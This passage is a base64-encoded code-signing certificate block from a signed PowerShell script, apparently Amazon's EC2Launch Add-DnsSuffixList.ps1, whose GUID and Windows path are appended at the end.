AxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcgUlNBNDA5NiBTSEEz # ODQgMjAyMSBDQTEwHhcNMjIxMTA1MDAwMDAwWhcNMjMxMTA4MjM1OTU5WjCB8jET # MBEGCysGAQQBgjc8AgEDEwJVUzEZMBcGCysGAQQBgjc8AgECEwhEZWxhd2FyZTEd # MBsGA1UEDwwUUHJpdmF0ZSBPcmdhbml6YXRpb24xEDAOBgNVBAUTBzQxNTI5NTQx # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0 # dGxlMSIwIAYDVQQKExlBbWF6b24gV2ViIFNlcnZpY2VzLCBJbmMuMRMwEQYDVQQL # EwpBbWF6b24gRUMyMSIwIAYDVQQDExlBbWF6b24gV2ViIFNlcnZpY2VzLCBJbmMu # MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEA0jWbhD4ghdeO4Nndy/2h # vCCUPPKnL63myeBZYItXG1dnB5gpJIrBVu40V4OaiNwyUAiBrO5eGM4IaWLqbxvj # 324KRuXtmHcXvF7YRgiciflrsfzoUEu4TdKj+owTNA2uektzbVLWzT0wFKe5n4Xe # CAqQQe33ODVB+cBTUSv/TRWf3Edni17S8HldwSq+YvPIRv21Shp7fiCxO45ETxwl # BsoeNrwLAQz0QpiaGdY5Fb+12jcoWRqYqAiXGeDLA7Wxq1+Xj2n+UwelzhYfcE5/ # p8w4FsFJi9tVb0aWS63OnP+aTOCrA5bz5j9wq8x25/hCGm6HktmbZRwjKiFQ+HdL # g0t3250T9hxvXjudh/DGPCIcmQzKBuxijP8f60DutqLk/EsS+Z5xD/s9/rruXfAj # czkZ/xpHLHKa+Fp7x+tIwuC5Zq6VAM6CFgJOWefYG5h8sjZFhrphbnYzs0C75SCx # KOKFe6RyrQ+O+xh96ky4kw47zNXbbc7xBqVjLjbOgSTFAgMBAAGjggI1MIICMTAf # BgNVHSMEGDAWgBRoN+Drtjv4XxGG+/5hewiIZfROQjAdBgNVHQ4EFgQUOv3VJlso # 3pHAv43pOWMQfdVdjXkwLgYDVR0RBCcwJaAjBggrBgEFBQcIA6AXMBUME1VTLURF # TEFXQVJFLTQxNTI5NTQwDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUF # BwMDMIG1BgNVHR8Ega0wgaowU6BRoE+GTWh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNv # bS9EaWdpQ2VydFRydXN0ZWRHNENvZGVTaWduaW5nUlNBNDA5NlNIQTM4NDIwMjFD # QTEuY3JsMFOgUaBPhk1odHRwOi8vY3JsNC5kaWdpY2VydC5jb20vRGlnaUNlcnRU # cnVzdGVkRzRDb2RlU2lnbmluZ1JTQTQwOTZTSEEzODQyMDIxQ0ExLmNybDA9BgNV # HSAENjA0MDIGBWeBDAEDMCkwJwYIKwYBBQUHAgEWG2h0dHA6Ly93d3cuZGlnaWNl # cnQuY29tL0NQUzCBlAYIKwYBBQUHAQEEgYcwgYQwJAYIKwYBBQUHMAGGGGh0dHA6 # Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBcBggrBgEFBQcwAoZQaHR0cDovL2NhY2VydHMu # ZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0Q29kZVNpZ25pbmdSU0E0MDk2 # U0hBMzg0MjAyMUNBMS5jcnQwDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQsFAAOC # AgEARxdSHXYd6BO2G0SQESFEKuC2xGsuekZq4Q//Jg3mHKBkDSLrK1PEriBExb5n # JNAmCoh374kLOj9fbV5kPmj2kTdH65b1GVIp4VADVOwla1NGrbqFIvSzUN68xqWw # ITM15yR5OU4peuSD8pdxGLwIM3YEsorhVugVI/TZ3oSs89vMNKIUK4qrHvDpveUf # 1tQKFYUwyKEkauDqovs2pS7G6+1mqSgXx4Nt1OdZwwdXS8d14xcsaz96C+4G7fAr # lbcKiGnHwxlO0FaC+piuverA1NU3lw8UFlTdaQxldKhS47iKZaWTS+mwi2H5PC2G # cgXNlQG5tuh/TimhfHpqrvtrXBpNQTU6ydv6E/Bj6DE5VkJGIKua0GvI7LkwFBFC # WD1hrAEjtY2LkPAgMDQe9iqPoEGeNwZeEjJjLgayPLP7NsJRdA6uhXboMEFW2LNf # VM/hdzl1RG/5kJ4La/mEkpvQRtZRbaSPuSHRxGz//P62qKFQGL0K/YI9RlowyGrQ # ENfvztdmqPN8xLJ7C7IuWkx2ygO++4Vva/DaiXX2gMtt6hYYfngOt6+beRWLbpdr # cNgUrUJAGg8saVOkrBdziuB0fS93jso0mBvz0DTFXE5vvE8yOYQWR0njIOKbZuB5 # A15FSIngJ+joE7MFjkxwkQwx5czjrG0GVfqSSK8WiL5yq2wxghnnMIIZ4wIBATB9 # MGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjFBMD8GA1UE # AxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcgUlNBNDA5NiBTSEEz # ODQgMjAyMSBDQTECEALHJW8P+/5y2kxuqqg11VUwDQYJYIZIAWUDBAIBBQCgfDAQ # BgorBgEEAYI3AgEMMQIwADAZBgkqhkiG9w0BCQMxDAYKKwYBBAGCNwIBBDAcBgor # BgEEAYI3AgELMQ4wDAYKKwYBBAGCNwIBFTAvBgkqhkiG9w0BCQQxIgQgW5Ej8brX # 5YlTBkoyY2drpoCT/V57IcT8S8Iq8hJJVtswDQYJKoZIhvcNAQEBBQAEggGAt5Ty # 7obsD/Z0ezG66VhUH0wII01W42R03uEEvqZg2YFV6D+kt5pnjZ4xSz+Vu0EP3eth # tUZcpF/uZOeLC1OVhCW+/VaqTjLZChaMBxzvEIB+RoUcOnxUJL5d3Qd9TAbLpm6i # nrm2KC4cgnNkRUsal37xBaTXPqoayv2ZGpkUtay8UkZzYinn3pKyjdWudevHInbO # hRY0LFWi9O3PRE3/iyTCCFP63zkcZrIKCC3Qy4U0oFbXQOZ3DsnJtMuC/1j0tUb5 # veZmgGjgG1/UGR/55o/cI+NiFMpkodqgyV/td4qrOkLg4SVk8ULKkDNxlhLIjOxg # WWYEyrEBr1L5BHO6MxmD9DLl2ysotevtX8WVt5wsgfY2pbGYx8nqFKBVPBhW26p/ # 33axLhgR8rNhhRRkU/W3uT1bW3x0sfssTaF6R3riQhrex27IJFPTLwOeJEQ5UhhE # IMdmXSQYEPHEQ4RqUTISJsMJ8KZrwktxpETj0cH3mSkmhFIiMpVwaQ633m5qoYIX # PTCCFzkGCisGAQQBgjcDAwExghcpMIIXJQYJKoZIhvcNAQcCoIIXFjCCFxICAQMx # DzANBglghkgBZQMEAgEFADB3BgsqhkiG9w0BCRABBKBoBGYwZAIBAQYJYIZIAYb9 # bAcBMDEwDQYJYIZIAWUDBAIBBQAEIHZBTdEg6m7H1JWYSgkwZqZJca9sn4GAr8Tv # //NRYrMmAhBBWvl/ekQTLH0fNK1QEpn/GA8yMDIyMTIyNDA5MjMyNlqgghMHMIIG # wDCCBKigAwIBAgIQDE1pckuU+jwqSj0pB4A9WjANBgkqhkiG9w0BAQsFADBjMQsw # CQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xOzA5BgNVBAMTMkRp # Z2lDZXJ0IFRydXN0ZWQgRzQgUlNBNDA5NiBTSEEyNTYgVGltZVN0YW1waW5nIENB # MB4XDTIyMDkyMTAwMDAwMFoXDTMzMTEyMTIzNTk1OVowRjELMAkGA1UEBhMCVVMx # ETAPBgNVBAoTCERpZ2lDZXJ0MSQwIgYDVQQDExtEaWdpQ2VydCBUaW1lc3RhbXAg # MjAyMiAtIDIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDP7KUmOsap # 8mu7jcENmtuh6BSFdDMaJqzQHFUeHjZtvJJVDGH0nQl3PRWWCC9rZKT9BoMW15GS # OBwxApb7crGXOlWvM+xhiummKNuQY1y9iVPgOi2Mh0KuJqTku3h4uXoW4VbGwLpk # U7sqFudQSLuIaQyIxvG+4C99O7HKU41Agx7ny3JJKB5MgB6FVueF7fJhvKo6B332 # q27lZt3iXPUv7Y3UTZWEaOOAy2p50dIQkUYp6z4m8rSMzUy5Zsi7qlA4DeWMlF0Z # Wr/1e0BubxaompyVR4aFeT4MXmaMGgokvpyq0py2909ueMQoP6McD1AGN7oI2TWm # tR7aeFgdOej4TJEQln5N4d3CraV++C0bH+wrRhijGfY59/XBT3EuiQMRoku7mL/6 # T+R7Nu8GRORV/zbq5Xwx5/PCUsTmFntafqUlc9vAapkhLWPlWfVNL5AfJ7fSqxTl # OGaHUQhr+1NDOdBk+lbP4PQK5hRtZHi7mP2Uw3Mh8y/CLiDXgazT8QfU4b3ZXUtu # MZQpi+ZBpGWUwFjl5S4pkKa3YWT62SBsGFFguqaBDwklU/G/O+mrBw5qBzliGcnW # hX8T2Y15z2LF7OF7ucxnEweawXjtxojIsG4yeccLWYONxu71LHx7jstkifGxxLjn # U15fVdJ9GSlZA076XepFcxyEftfO4tQ6dwIDAQABo4IBizCCAYcwDgYDVR0PAQH/ # BAQDAgeAMAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwIAYD # VR0gBBkwFzAIBgZngQwBBAIwC03f28ea5-d179-4890-afff-fad8e6c7fb0cC:\ProgramData\Amazon\EC2-Windows\Launch\Module\Scripts\Add-DnsSuffixList.ps1